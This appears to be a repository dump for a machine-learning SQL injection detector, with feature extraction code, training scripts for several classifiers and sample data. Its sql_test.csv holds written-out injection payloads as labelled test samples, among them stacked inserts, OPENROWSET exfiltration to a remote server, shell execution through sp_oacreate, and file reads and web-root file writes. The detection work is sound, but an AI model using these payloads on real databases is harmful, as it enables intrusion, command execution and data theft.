19 | t%3D1498533566250%26rst%3Dswf%2Cimg%26ct%3Dd%26cs%3D2074%26td%3D%26s%3D310736%26v%3D710297211%26u%3D1154411548%26k%3D%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%7C%26paid%3D1%26tt%3D%E5%A4%A7%E5%86%9B%E5%B8%88%E5%8F%B8%E9%A9%AC%E6%87%BF%E4%B9%8B%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%2B10%26pu%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTE4ODg0NA%3D%3D.html%3Ffrom%3Dy1.2-2.2%26ref%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTExNDMwNA%3D%3D.html%3Fspm%3Da2h0j.8191423.item_XMjg0MTExNDMwNA%3D%3D.A%26sid%3D1bjjov5pb2l1k%26p%3D323%26_%3D%3E%3E
20 | type%3DgetUserSetCarIcon%26carId%3D460018499102909%26direction%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%26carIconType%3D0
21 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/nortest_matrix.csv:
--------------------------------------------------------------------------------
1 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000
2 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000
3 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000
4 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000
5 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000
6 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000
7 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000
8 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000
9 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000
10 | 35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000
11 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000
12 | 94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000
13 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000
14 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000
15 | 591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000
16 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000
17 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000
18 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000
19 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000
20 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000
21 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/sql_test.csv:
--------------------------------------------------------------------------------
1 | ; and 1=1 and 1=22.admin adminuser user pass password ..
2 | and 0<>(select count(*) from *)
3 | group by users.id having 1=1--
4 | group by users.id, users.username, users.password, users.privs having 1=1--
5 | ; insert into users values( 666, attacker, foobar, 0xffff )--
6 | UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable-
7 | and user_blank>_name()=dbo--
8 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U)
9 | ;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;--
10 | :a or name like fff%;-- ffff。
11 | and 1<>(select count(email) from [user]);--
12 | ;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
13 | id=152 and exists(select * from aaa where aaa>5)
14 | insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
15 | table2_blank>table1。IP
16 | insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
17 | HASH_blank>hashsysxlogins。
18 | insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins)
19 | 1and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));--
20 | ;insert dirs exec master.dbo.xp_blank>_dirtree c:\--
21 | and 0<>(select top 1 paths from dirs)--
22 | and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
23 | ;create table dirs1(paths varchar(100), id int)--
24 | ;insert dirs exec master.dbo.xp_blank>_dirtree e:\web--
25 | and 0<>(select top 1 paths from dirs1)--
26 | and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
27 | and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 。
28 | and 1=(select user_blank>_id from USER_blank>_LOGIN)
29 | and 0=(select user from USER_blank>_LOGIN where user>1)
30 | exec sp_blank>_oacreate wscript.shell, @o out
31 | exec sp_blank>_oamethod @o, run, NULL, notepad.exe
32 | ; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--
33 | declare @o int, @f int, @t int, @ret int
34 | declare @line varchar(8000)
35 | exec sp_blank>_oacreate scripting.filesystemobject, @o out
36 | exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
37 | exec @ret = sp_blank>_oamethod @f, readline, @line out
38 | exec sp_blank>_oacreate scripting.filesystemobject, @o out
39 | exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
40 | exec @ret = sp_blank>_oamethod @f, writeline, NULL,
41 | exec sp_blank>_oacreate speech.voicetext, @o out
42 | exec sp_blank>_oamethod @o, register, NULL, foo, bar
43 | exec sp_blank>_oasetproperty @o, speed, 150
44 | exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528waitfor delay 00:00:05
45 | ; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
46 | 1+and+1=1
47 | ');waitFor+Delay+'00:00:05'
48 | ') or '1'='1--
49 | OR 1=1
50 | WHERE 1=1 AND 1=1
51 | ORDER BY 1--
52 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
53 |
54 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/sqltest_matrix.csv:
--------------------------------------------------------------------------------
1 | 56.000000,0.000000,0.000000,0.089286,0.160714,0.035714,0.000000,1.000000
2 | 31.000000,0.000000,0.000000,0.032258,0.129032,0.000000,0.000000,1.000000
3 | 30.000000,0.000000,0.000000,0.066667,0.133333,0.033333,0.000000,1.000000
4 | 75.000000,0.000000,0.000000,0.026667,0.093333,0.013333,0.000000,1.000000
5 | 61.000000,0.000000,0.000000,0.065574,0.147541,0.000000,0.000000,1.000000
6 | 112.000000,0.000000,0.508929,0.008929,0.071429,0.008929,0.000000,1.000000
7 | 28.000000,0.000000,0.000000,0.000000,0.035714,0.035714,0.000000,1.000000
8 | 64.000000,0.000000,0.015625,0.031250,0.125000,0.015625,0.000000,1.000000
9 | 62.000000,0.000000,0.000000,0.112903,0.032258,0.000000,0.000000,1.000000
10 | 29.000000,0.000000,0.000000,0.000000,0.172414,0.000000,0.034483,1.000000
11 | 43.000000,0.000000,0.000000,0.023256,0.093023,0.023256,0.000000,1.000000
12 | 107.000000,0.000000,0.000000,0.018692,0.130841,0.037383,0.000000,1.000000
13 | 48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000
14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000
15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000
16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000
17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000
18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000
19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000
20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000
21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000
22 | 68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000
23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000
24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000
25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000
26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000
27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000
28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000
29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000
30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000
31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000
32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000
33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000
34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000
35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000
37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000
38 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000
40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000
41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000
42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000
43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000
44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000
45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000
46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000
47 | 27.000000,0.000000,0.074074,0.222222,0.000000,0.000000,0.000000,1.000000
48 | 14.000000,0.000000,0.000000,0.142857,0.142857,0.071429,0.000000,1.000000
49 | 6.000000,0.000000,0.333333,0.333333,0.166667,0.166667,0.000000,1.000000
50 | 17.000000,0.000000,0.470588,0.235294,0.176471,0.117647,0.000000,1.000000
51 | 12.000000,0.000000,0.583333,0.083333,0.166667,0.000000,0.000000,1.000000
52 | 83.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
53 | 0.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
54 |
--------------------------------------------------------------------------------
/ML_for_SQL/featurepossess.py:
--------------------------------------------------------------------------------
1 | # -*- coding: UTF-8 -*-
2 | import re
3 |
def generate(odir,wdir,label):
    """Extract per-line features from a sample file and write them as CSV rows.

    Every line of ``odir`` (decoded as UTF-8, surrounding whitespace stripped)
    produces one row in ``wdir`` holding eight ``%f``-formatted columns:
    line length, keyword count, upper-case ratio, digit ratio, space ratio,
    special-character ratio, prefix-character ratio and ``label``.

    Empty lines produce a row whose length, count and ratios are all zero.
    (Previously they inherited the ratios of the preceding line, or raised
    ``NameError`` when the very first line was empty.)

    Args:
        odir: Path of the raw sample file, one sample per line.
        wdir: Path of the feature CSV to create; an existing file is
            overwritten.
        label: Numeric class label written as the last column of every row.

    Returns:
        ``wdir``, so the result can be handed straight to a CSV reader.
    """
    # Compiled once instead of once per input line.
    digit_re = re.compile(r'\d')
    upper_re = re.compile(r'[A-Z]')

    # URL-encoded SQL keywords counted in the lower-cased line.
    # NOTE(review): 'version%20' appears twice (so it is counted twice) and
    # 'unnion%20' looks like a typo for 'union%20'. Both are kept as-is so
    # the features of non-empty lines stay unchanged; confirm before fixing.
    keywords = (
        'and%20', 'or%20', 'xor%20', 'sysobjects%20', 'version%20',
        'substr%20', 'len%20', 'substring%20', 'exists%20',
        'mid%20', 'asc%20', 'inner join%20', 'xp_cmdshell%20', 'version%20',
        'exec%20', 'having%20', 'unnion%20', 'order%20', 'information schema',
        'load_file%20', 'load data infile%20', 'into outfile%20',
        'into dumpfile%20',
    )

    with open(odir, 'rb') as f:
        data = [x.decode('utf-8').strip() for x in f.readlines()]

    # The context manager closes the output file even if a line fails.
    with open(wdir, 'w') as f_input:
        for line in data:
            length = len(line)
            # Reset per line so an empty line never reuses stale values.
            key_num = 0
            capital_f = num_f = space_f = special_f = prefix_f = 0.0

            if length:
                # Digit and upper-case ratios use the original casing.
                num_f = len(digit_re.findall(line)) / length
                capital_f = len(upper_re.findall(line)) / length

                line = line.lower()
                key_num = sum(line.count(word) for word in keywords)
                # Ratio of literal and URL-encoded spaces.
                space_f = (line.count(" ") + line.count("%20")) / length
                # NOTE(review): 'NULL' can never match the lower-cased line,
                # and '28%' is presumably meant to be '%28' (URL-encoded
                # "("). Kept unchanged; confirm before fixing.
                special_f = (line.count("{") * 2 + line.count('28%') * 2
                             + line.count('NULL') + line.count('[')
                             + line.count('=') + line.count('?')) / length
                prefix_f = (line.count('\\x') + line.count('&')
                            + line.count('\\u') + line.count('%')) / length

            f_input.write('%f,%f,%f,%f,%f,%f,%f,%f' % (length, key_num, capital_f, num_f, space_f, special_f, prefix_f, label) + '\n')

    return wdir
39 |
--------------------------------------------------------------------------------
/ML_for_SQL/file/Adaboost.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/Adaboost.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/GBDT.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/GBDT.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/bys.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/bys.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/forestrandom.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/forestrandom.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/knn.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/knn.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/lg.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/lg.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/svm.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/svm.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/tree.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/tree.model
--------------------------------------------------------------------------------
/ML_for_SQL/sqlbys.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | from sklearn import metrics
10 | from sklearn.naive_bayes import GaussianNB
11 | from sklearn.model_selection import train_test_split
12 | from featurepossess import generate
13 | from sklearn.externals import joblib
14 |
# Train and evaluate a Gaussian naive Bayes classifier on the SQL-injection
# (label 1) and normal (label 0) samples.
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The generated feature files have no header row. Reading them with
# header=None keeps the first sample of each class; the default would turn
# it into column names and silently drop it from the data set.
all_df = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
# The merged matrix is still written to disk, now as pure data rows.
all_df.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = all_df.values
data = np.delete(arr, -1, axis=1)  # features: drop the last (label) column
target = arr[:, 7]  # label column
# Randomly split into training and test sets.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model
clf = GaussianNB()  # create the classifier
clf.fit(train_data, train_target)  # train the model
joblib.dump(clf, './file/bys.model')
print("bys.model has been saved to 'file/bys.model'")
y_pred = clf.predict(test_data)  # predict
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqlforestrandom.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn.ensemble import RandomForestClassifier
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
# Train and evaluate a random forest classifier on the SQL-injection
# (label 1) and normal (label 0) samples.
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The generated feature files have no header row. Reading them with
# header=None keeps the first sample of each class; the default would turn
# it into column names and silently drop it from the data set.
all_df = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
# The merged matrix is still written to disk, now as pure data rows.
all_df.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = all_df.values
data = np.delete(arr, -1, axis=1)  # features: drop the last (label) column
target = arr[:, 7]  # label column
# Randomly split into training and test sets.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model
clf = RandomForestClassifier(n_estimators=10, max_depth=2)  # create the classifier
clf.fit(train_data, train_target)  # train the model
joblib.dump(clf, './file/forestrandom.model')
print("forestrandom.model has been saved to 'file/forestrandom.model'")
y_pred = clf.predict(test_data)  # predict
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqlkNN.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn import neighbors
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
# Train and evaluate a k-nearest-neighbours classifier on the SQL-injection
# (label 1) and normal (label 0) samples.
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The generated feature files have no header row. Reading them with
# header=None keeps the first sample of each class; the default would turn
# it into column names and silently drop it from the data set.
all_df = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
# The merged matrix is still written to disk, now as pure data rows.
all_df.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = all_df.values
data = np.delete(arr, -1, axis=1)  # features: drop the last (label) column
target = arr[:, 7]  # label column
# Randomly split into training and test sets.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model
clf = neighbors.KNeighborsClassifier(algorithm='ball_tree')  # create the classifier
clf.fit(train_data, train_target)  # train the model
joblib.dump(clf, './file/knn.model')
print("knn.model has been saved to 'file/knn.model'")
y_pred = clf.predict(test_data)  # predict
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqllogistic.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | from sklearn import metrics
10 | from sklearn.linear_model import LogisticRegression
11 | from sklearn.model_selection import train_test_split
12 | from featurepossess import generate
13 | from sklearn.externals import joblib
14 |
# Train and evaluate a logistic regression classifier on the SQL-injection
# (label 1) and normal (label 0) samples.
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The generated feature files have no header row. Reading them with
# header=None keeps the first sample of each class; the default would turn
# it into column names and silently drop it from the data set.
all_df = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
# The merged matrix is still written to disk, now as pure data rows.
all_df.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = all_df.values
data = np.delete(arr, -1, axis=1)  # features: drop the last (label) column
target = arr[:, 7]  # label column
# Randomly split into training and test sets.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model
clf = LogisticRegression()  # create the classifier
clf.fit(train_data, train_target)  # train the model
joblib.dump(clf, './file/lg.model')
print("lg.model has been saved to 'file/lg.model'")
y_pred = clf.predict(test_data)  # predict
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqlsvm.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Oct 30 20:00:50 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn.svm import SVC
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
# Train and evaluate an RBF-kernel SVM classifier on the SQL-injection
# (label 1) and normal (label 0) samples.
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The generated feature files have no header row. Reading them with
# header=None keeps the first sample of each class; the default would turn
# it into column names and silently drop it from the data set.
all_df = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
# The merged matrix is still written to disk, now as pure data rows.
all_df.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = all_df.values
data = np.delete(arr, -1, axis=1)  # features: drop the last (label) column
target = arr[:, 7]  # label column
# Randomly split into training and test sets.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=8)
clf = SVC(kernel='rbf')  # create the classifier; no probability option is passed
clf.fit(train_data, train_target)  # fit the classifier on the training data
joblib.dump(clf, './file/svm.model')
print("svm.model has been saved to 'file/svm.model'")
y_pred = clf.predict(test_data)  # predict
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
45 | #print('F1:%.3f' %metrics.f1_score(y_true=test_target,y_pred=y_pred))#F1度量
46 | #fpr,tpr,thresholds=metrics.roc_curve(y_true=test_target,y_score=y_pred)
47 | #print(fpr,tpr,thresholds)
48 | #print('auc:%.3f' %metrics.auc(fpr,tpr))
49 | #print('auc:%.3f' %metrics.roc_auc_score(y_true=test_target,y_score=y_pred))
50 | #plt.figure(1)
51 | #plt.axis([0,1,0,1])#设置横轴纵轴最大坐标
52 | #plt.plot([0,1],[0,1],'k--')#绘制对角线曲线
53 | #plt.plot(fpr,tpr,label='ROCcurve')#有问题,只有3个点
54 | #plt.xlabel('False positive rate')#x轴标签
55 | #plt.ylabel('True positive rate')#y轴标签
56 | #plt.title('ROC curve')
57 | #plt.legend(loc='best')#生成图例
58 | #plt.show()#显示图形
59 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqltree.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Tue Nov 7 14:40:05 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn import tree
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
# Train and evaluate a depth-1 decision tree classifier on the SQL-injection
# (label 1) and normal (label 0) samples.
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The generated feature files have no header row. Reading them with
# header=None keeps the first sample of each class; the default would turn
# it into column names and silently drop it from the data set.
all_df = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
# The merged matrix is still written to disk, now as pure data rows.
all_df.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = all_df.values
data = np.delete(arr, -1, axis=1)  # features: drop the last (label) column
target = arr[:, 7]  # label column
# Randomly split into training and test sets.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model
clf = tree.DecisionTreeClassifier(criterion="entropy", max_depth=1)
clf.fit(train_data, train_target)  # train the model
joblib.dump(clf, './file/tree.model')
print("tree.model has been saved to 'file/tree.model'")
y_pred = clf.predict(test_data)  # predict
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
46 |
47 |
--------------------------------------------------------------------------------
/ML_for_SQL/testsql.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Oct 30 20:00:50 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn.svm import SVC
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
def test_c(flag,sql_flag):
    """Build the feature matrix for the test samples and return its path.

    Args:
        flag: Number of test files as typed by the user; ``'1'`` selects a
            single sample file, anything else selects both.
        sql_flag: With ``flag == '1'``, ``'0'`` selects the normal samples
            and ``'1'`` the SQL-injection samples.

    Returns:
        Path of the headerless feature CSV to evaluate.
    """
    sql_dir = "./data/sql_test.csv"
    nor_dir = "./data/normal_test.csv"
    allm_dir = "./data/alltest_matrix.csv"
    if flag == '1' and sql_flag == '0':
        # Written to the test matrix file, as in the combined branch below,
        # so a test run no longer overwrites the training nor_matrix.csv.
        return generate(nor_dir, "./data/nortest_matrix.csv", 0)
    if flag == '1' and sql_flag == '1':
        return generate(sql_dir, "./data/sqltest_matrix.csv", 1)

    sql_matrix = generate(sql_dir, "./data/sqltest_matrix.csv", 1)
    nor_matrix = generate(nor_dir, "./data/nortest_matrix.csv", 0)
    # The generated files have no header row; header=None keeps the first
    # sample of each class instead of consuming it as column names.
